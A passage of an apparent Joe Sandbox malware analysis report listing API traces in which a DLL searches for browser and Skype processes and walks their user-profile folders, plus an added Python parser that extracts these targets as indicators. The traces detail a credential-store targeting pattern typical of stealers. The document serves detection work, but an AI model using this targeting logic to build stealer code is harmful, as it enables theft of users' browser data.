                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                          • String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
                                                          • API String ID: 1983172782-2662846904
                                                          • Opcode ID: d929c9d7e6e2ddc006b7321b863d3d1fcb39d8f080301b7359882cf3280fcb7a
                                                          • Instruction ID: b508ae645e237c7229c1d69a2e2dd707763a9c57ac4a9714039cccd54a056aaa
                                                          • Opcode Fuzzy Hash: d929c9d7e6e2ddc006b7321b863d3d1fcb39d8f080301b7359882cf3280fcb7a
                                                          • Instruction Fuzzy Hash: C9216579408788ABE254DB54D942FDEB7D4EF84710F40891CF19D821D6EB74A504CBA3
                                                          APIs
                                                          • #537.MFC42(SogouExplorer.exe), ref: 1000F247
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F25F
                                                          • #540.MFC42 ref: 1000F269
                                                          • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F29B
                                                          • #924.MFC42(0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2B3
                                                          • #800.MFC42(0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2C4
                                                          • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2CE
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                            • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                            • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                            • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                            • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                            • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                            • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                            • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • #800.MFC42 ref: 1000F2ED
                                                          • #800.MFC42 ref: 1000F301
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                          • String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
                                                          • API String ID: 1983172782-2055279553
                                                          • Opcode ID: 51939aa5053ae2bff0236cf59cf2096a6ea1610dc964246ad680e0cd77336b3f
                                                          • Instruction ID: 7d35013b61d80cf1e9c1dfe39d441eecd520366740e00716b73819efa327f1aa
                                                          • Opcode Fuzzy Hash: 51939aa5053ae2bff0236cf59cf2096a6ea1610dc964246ad680e0cd77336b3f
                                                          • Instruction Fuzzy Hash: F6218779408788ABE354DB54DD42FDBB7D4EB84700F40891CF19D821D6EB74A504CBA3
                                                          APIs
                                                          • #537.MFC42(chrome.exe), ref: 1000EE07
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000EE1F
                                                          • #540.MFC42 ref: 1000EE29
                                                          • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000EE5B
                                                          • #924.MFC42(0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE73
                                                          • #800.MFC42(0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE84
                                                          • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE8E
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                            • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                            • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                            • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                            • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                            • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                            • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                            • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • #800.MFC42 ref: 1000EEAD
                                                          • #800.MFC42 ref: 1000EEC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                          • String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
                                                          • API String ID: 1983172782-2559963756
                                                          • Opcode ID: 523ad62f1040f6ae26f22e01937fcab8022a47d8d2344defdecc7f28f5186ab4
                                                          • Instruction ID: 8c6a82a66adb9de8b1ca2427e2dad7b5aad7125b1f470a43c445caaf05036487
                                                          • Opcode Fuzzy Hash: 523ad62f1040f6ae26f22e01937fcab8022a47d8d2344defdecc7f28f5186ab4
                                                          • Instruction Fuzzy Hash: 1D216579408784ABE254DB54DD46FDEB7D5EB84700F40891CF19D821D6EB74A504CBA3
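The five API listings in this part of the report (the routines at 1000F05F for 360se6.exe, 1000F147 for QQBrowser.exe, 1000F247 for SogouExplorer.exe, 1000EE07 for chrome.exe and 1000EF07 for Skype.exe) are the same routine compiled five times with different literals: wrap a process name in an MFC CString (#537.MFC42), walk the process list through the shared helper 1000BBB0 (CreateToolhelp32Snapshot / Process32First / Process32Next), ask SHGetSpecialFolderPathA for CSIDL 0x07, splice "C:\Users\" and a per-application "\AppData\..." suffix together, Sleep 0x3E8 ms, then hand the result to the shared helper 1000BD50, which appends "*.*" and calls FindFirstFileA. The following parser is an added example, not code from the report or from Joe Sandbox: it reads that listing format and pulls out the process-to-profile-directory table an analyst would want as IOCs. The input is constructed from the four routines that are visible in full here (the 360se6.exe listing starts above this section, so its #537 line is not included); the user-name splice in `profile_paths` is inferred from the "C:\Users\" literal and the fact that CSIDL 0x07 (CSIDL_STARTUP) lies under the user profile, not from resolving the #926/#924 CString ordinals.

```python
"""Extract the browser-profile targeting table from a Joe Sandbox API trace.

Added example (not code from the report or from Joe Sandbox). It parses the
per-function "APIs" listing format used above, one call per line with the
arguments in parentheses and a trailing "ref: <addr>", groups the calls into
the sibling routines that each open with a #537.MFC42(<name>.exe) call, and
records per target process the profile sub-path the sample builds, the CSIDL
passed to SHGetSpecialFolderPathA, the Sleep delay and the shared helpers it
calls (1000BBB0 = Toolhelp32 process walk, 1000BD50 = FindFirstFileA walk).
"""
import re

# Constructed input: the four complete sibling routines visible in this
# section (QQBrowser.exe, SogouExplorer.exe, chrome.exe, Skype.exe). The lines
# are copied from the report; indentation and most subcall lines are dropped.
TRACE = r"""
• #537.MFC42(QQBrowser.exe), ref: 1000F147
  • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F15F
• #924.MFC42(0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1B3
• Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1CE
  • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
• #537.MFC42(SogouExplorer.exe), ref: 1000F247
  • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F25F
• #924.MFC42(0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2B3
• Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\SogouExplorer,00000002,C:\Users\,0000005C), ref: 1000F2CE
  • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
• #537.MFC42(chrome.exe), ref: 1000EE07
  • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000EE1F
• #924.MFC42(0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE73
• Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Local\Google\Chrome\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000EE8E
  • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
• #537.MFC42(Skype.exe), ref: 1000EF07
  • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000EF1F
• #924.MFC42(0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF73
• Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF8E
  • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
"""

# One trace line: optional "Part of subcall function XXXXXXXX:" prefix, then
# <api>.<module>(<args>), ref: <addr>. The parentheses are optional because
# calls such as "#800.MFC42 ref: 1000F0ED" carry no arguments.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^(\s]+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# CSIDL values as defined in shlobj.h (only the ones relevant to this sample).
CSIDL_NAMES = {0x0007: "CSIDL_STARTUP", 0x001A: "CSIDL_APPDATA", 0x001C: "CSIDL_LOCAL_APPDATA"}


def csidl_name(csidl):
    return CSIDL_NAMES.get(csidl, "CSIDL_0x%04X" % csidl)


def parse_targets(trace):
    """Return one record per routine, in trace order."""
    targets, cur = [], None
    for line in trace.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        api, module, ref = m["api"], m["module"], m["ref"]
        args = m["args"].split(",") if m["args"] is not None else []
        if m["sub"]:
            # Inlined view of a shared helper: only record which helpers run.
            if cur is not None:
                cur["subcalls"].add(m["sub"])
            continue
        # A top-level #537.MFC42 call with a bare "<name>.exe" literal opens a
        # new routine; the helper's own #537 calls arrive as subcall lines.
        if (api, module) == ("#537", "MFC42") and len(args) == 1 and args[0].lower().endswith(".exe"):
            cur = {"process": args[0], "func_ref": ref, "csidl": None,
                   "profile_subpath": None, "sleep_ms": None, "subcalls": set()}
            targets.append(cur)
        elif cur is None:
            continue
        elif api == "SHGetSpecialFolderPathA":
            # SHGetSpecialFolderPathA(hwnd, pszPath, csidl, fCreate): 3rd arg is the CSIDL.
            cur["csidl"] = int(args[2], 16)
        elif (api, module) == ("#924", "MFC42"):
            cur["profile_subpath"] = next(a for a in args if a.startswith("\\AppData\\"))
        elif api == "Sleep":
            cur["sleep_ms"] = int(args[0], 16)
    return targets


def profile_paths(targets, user):
    # Inferred from the literals: "C:\Users\" + <user> + "\AppData\...". The
    # user name is taken from the CSIDL_STARTUP path, which sits under the
    # profile; the exact CString ops behind #926/#924 are not resolved here.
    return {t["process"]: "C:\\Users\\" + user + t["profile_subpath"] for t in targets}


if __name__ == "__main__":
    for t in parse_targets(TRACE):
        print("%-18s %s sleep=%dms helpers=%s %s" % (t["process"], csidl_name(t["csidl"]),
              t["sleep_ms"], ",".join(sorted(t["subcalls"])), t["profile_subpath"]))
```

Run stand-alone, it prints one line per routine: every target uses CSIDL_STARTUP, a one-second Sleep and both helpers, which is what makes the five listings above a single template. The same parser works on the 360se6.exe listing once its opening #537 line is supplied, and the `profile_subpath` values are the strings to hunt for in memory dumps or YARA rules for this family.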
                                                          APIs
                                                          • #537.MFC42(Skype.exe), ref: 1000EF07
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000EF1F
                                                          • #540.MFC42 ref: 1000EF29
                                                          • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000EF5B
                                                          • #924.MFC42(0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF73
                                                          • #800.MFC42(0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF84
                                                          • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF8E
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                            • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                            • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                            • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                            • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                            • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                            • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                            • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • #800.MFC42 ref: 1000EFAD
                                                          • #800.MFC42 ref: 1000EFC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                          • String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
                                                          • API String ID: 1983172782-3499480952
                                                          • Opcode ID: 506967efb7cbd1429561d61a16553b74a6b62e0af240bad732d850845aeece2a
                                                          • Instruction ID: c2392c766fec2091ac0e11c8610587f68406746635502bb5fb4463dc87aa9c62
                                                          • Opcode Fuzzy Hash: 506967efb7cbd1429561d61a16553b74a6b62e0af240bad732d850845aeece2a
                                                          • Instruction Fuzzy Hash: 0B216579408788ABE254DB54D942FDEB7D4EB84700F40891CF19D821D6EB74A504CBA3
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$#825$Object$CursorDestroyRelease
                                                          • String ID:
                                                          • API String ID: 719826280-0
                                                          • Opcode ID: 2d077890a14f4d6575af65d40687cd70d6d7c34bba1e1dc241cd46e0adb5d077
                                                          • Instruction ID: 1057cd0b5374723fdd9eac028f866a029913c2518dbccd866ad41eb7240ccfe0
                                                          • Opcode Fuzzy Hash: 2d077890a14f4d6575af65d40687cd70d6d7c34bba1e1dc241cd46e0adb5d077
                                                          • Instruction Fuzzy Hash: 83114FBA600B149BD620EBB9DC80D57F3EDFF98210B154D1DFA8A87750DAB5F8448B60
                                                          APIs
                                                          • malloc.MSVCRT ref: 10007519
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 10007541
                                                          • free.MSVCRT ref: 1000759F
                                                          • GetFileAttributesA.KERNEL32(?), ref: 100075AD
                                                          • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 100075D4
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 100075E3
                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 100075F9
                                                          • ReadFile.KERNEL32(?,00000000,?,0000035D,00000000), ref: 1000761D
                                                          • CloseHandle.KERNEL32(?), ref: 1000762A
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 1000766A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
